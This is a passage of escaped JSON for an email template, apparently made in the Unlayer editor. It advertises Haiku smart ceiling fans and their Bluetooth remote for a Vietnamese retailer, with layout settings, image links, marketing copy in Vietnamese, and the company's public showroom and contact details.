"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5XMfCB2N_C\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e03e2d\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 44px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"40px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM SHOP - SALE UP TO 15%<\\/span><\\/strong><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":283,\\\"calculatedHeight\\\":47},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"J7e3FJNrSG\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"19px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_6\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"tel:0932641255\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoicGhvbmUiLCJhdHRycyI6eyJocmVmIjoidGVsOnt7cGhvbmV9fSJ9LCJ2YWx1ZXMiOnsicGhvbmUiOiIwOTMyNjQxMjU1In19\\\\\\\">Li\\u00ean h\\u1ec7 t\\u01b0 v\\u1ea5n b\\u00e1n h\\u00e0ng: <\\/a><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"tel:0909899367\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoicGhvbmUiLCJhdHRycyI6eyJocmVmIjoidGVsOnt7cGhvbmV9fSJ9LCJ2YWx1ZXMiOnsicGhvbmUiOiIwOTA5ODk5MzY3In19\\\\\\\">0909 899 367<\\/a>\\\"}},{\\\"id\\\":\\\"fhAyvauViK\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"4l6DIuGJqW\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_5\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110I\\u1ec0U KHI\\u1ec2N TI\\u1ec6N \\u00cdCH - TH\\u00d4NG MINH\\\"}},{\\\"id\\\":\\\"_K40u5XnIY\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng n\\u00e2ng cao c\\u1ee7a Haiku v\\u1edbi \\u0111i\\u1ec1u khi\\u1ec3n t\\u1eeb xa bluetooth cao c\\u1ea5p. \\u0110i\\u1ec1u ch\\u1ec9nh t\\u1ed1c \\u0111\\u1ed9 qu\\u1ea1t c\\u1ee7a b\\u1ea1n, thay \\u0111\\u1ed5i t\\u00f9y ch\\u1ecdn \\u00e1nh s\\u00e1ng ho\\u1eb7c s\\u1eed d\\u1ee5ng t\\u1ea5t c\\u1ea3 c\\u00e1c ch\\u1ebf \\u0111\\u1ed9 H\\u1eb9n gi\\u1edd, Xo\\u00e1y v\\u00e0 Ng\\u1ee7 m\\u00e0 kh\\u00f4ng c\\u1ea7n r\\u1eddi kh\\u1ecfi ch\\u1ed7 ng\\u1ed3i c\\u1ee7a b\\u1ea1n. N\\u1ebfu b\\u1ea1n lu\\u00f4n lu\\u00f4n m\\u1ea5t \\u0111\\u1ed3? \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa \\u0111i k\\u00e8m v\\u1edbi m\\u1ed9t gi\\u00e1 treo t\\u01b0\\u1eddng \\u0111\\u01a1n gi\\u1ea3n \\u0111\\u1ec3 \\u0111\\u1eb7t thu\\u1eadn ti\\u1ec7n v\\u00e0 an to\\u00e0n.<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"lz-ixEIpPZ\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"MJlj9zB0N8\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XiwlcZ22cN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677504582593-dieu-khien-haiku.png\\\",\\\"width\\\":813,\\\"height\\\":908},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"njYx9-f90X\\\",\\\"contents\\\":[{\\\"id\\\":\\\"7zgjSmD-a1\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503408657-intergatehaiku.jpg\\\",\\\"width\\\":800,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"y9235nL0ac\\\",\\\"contents\\\":[{\\\"id\\\":\\\"z59_MxupRK\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503423701-remote_control.jpg\\\",\\\"width\\\":800,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jYPxTblxnF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#95a5a6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LZdJbsA_5d\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503713719-home_haiku.jpg\\\",\\\"width\\\":1920,\\\"height\\\":944},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_13\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"HG30UIk3ly\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"19px 33px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"28px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\\\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">-------o0o------<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83c\\udf10 <a href=\\\\\\\"https:\\/\\/www.bigfans.vn\\\\\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">\\ud83c\\udf10 <a href=\\\\\\\"https:\\/\\/quattran.co\\\\\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"8hu9zilO_e\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"91%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#616888\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"19px 19px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"%unsubscribe_url%\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6IiV1bnN1YnNjcmliZV91cmwlIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">Hu\\u1ef7 \\u0111\\u0103ng k\\u00fd\\u00a0<\\/span><\\/a><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"headers\\\":[],\\\"footers\\\":[],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 